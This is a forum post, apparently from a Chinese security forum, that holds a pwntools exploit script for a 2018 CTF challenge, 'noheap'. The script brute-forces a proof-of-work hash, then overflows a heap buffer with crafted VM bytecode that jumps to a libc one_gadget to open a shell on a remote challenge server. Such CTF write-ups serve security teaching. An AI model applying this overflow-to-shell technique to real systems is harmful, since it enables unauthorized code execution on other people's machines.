-
-
ctf2018-第6题
-
发表于: 2018-6-26 23:44 2265
-
from pwn import * # context.log_level = 'debug' target_file = './noheap' # io = process(['./linux_server64'], aslr=False) # io = process([target_file], aslr=False) io = remote('139.199.99.130', 8989) def x_hash(s): v_hash = 0 for c in s: v_hash = (v_hash * 131 + ord(c)) & 0xFFFFFFFF return v_hash def x_bf_hash(v_hash): for i0 in xrange(43): for i1 in xrange(43): for i2 in xrange(43): for i3 in xrange(43): seed = 0 seed = (seed << 8) + i0 + 48 seed = (seed << 8) + i1 + 48 seed = (seed << 8) + i2 + 48 seed = (seed << 8) + i3 + 48 v = seed s = '' v = (214013 * v + 2531011) & 0xFFFFFFFF s += p32(v) v = (214013 * v + 2531011) & 0xFFFFFFFF s += p32(v) if x_hash(s) == v_hash: return s return '' def x_check_hash(): io.recvuntil('Hash:') v_hash = int(io.recvline().strip(), 16) io.sendline(x_bf_hash(v_hash)) return def exploit(): x_check_hash() libc_offset = 0xF72C0 # write+10 one_gadget = 0x4526a vm_data_offset = 0x30 delta = libc_offset - one_gadget buf = '' buf += '1'*(0x203140-0x2030C0) vm_inst_offset = len(buf) # vm_inst start # vm_execution continues at offset 0x0E after first v_call buf += p8(0x02)*13+p8(0x01)+p8(0x00) # one_gadget: [rsp+30]==NULL # read 0 ([rbp-48]==0) buf += p8(0x01)+p8(0x01)+p8(0x13) # write 0 buf += p8(0x01)+p8(0x03)+p8(0x14) # read libc_addr buf += p8(0x01)+p8(0x0D)+p8(0x13) # read delta from vm_data buf += p8(0x01)+p8(vm_data_offset+0x00)+p8(0x04) # sub delta buf += p8(0x05) # write one_gadget buf += p8(0x01)+p8(0x0D)+p8(0x14) # call one_gadget buf += p8(0x16) buf = buf.ljust(vm_inst_offset + vm_data_offset, '\x00') buf += p64(delta) # malloc, overflow vm_inst io.sendafter('>> ', '1') io.sendafter('Size :', '0') io.sendafter('Content :', buf) # free, call one_gadget io.sendafter('>> ', '3') io.interactive() return exploit()
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)
赞赏
他的文章
- KCTF2022春季赛 第三题 石像病毒 8881
- KCTF2022春季赛 第二题 末日邀请 16199
- KCTF2021秋季赛 第二题 迷失丛林 18846
- KCTF2020秋季赛 第十题 终焉之战 8900
- KCTF2020秋季赛 第九题 命悬一线 6481
看原图
赞赏
雪币:
留言: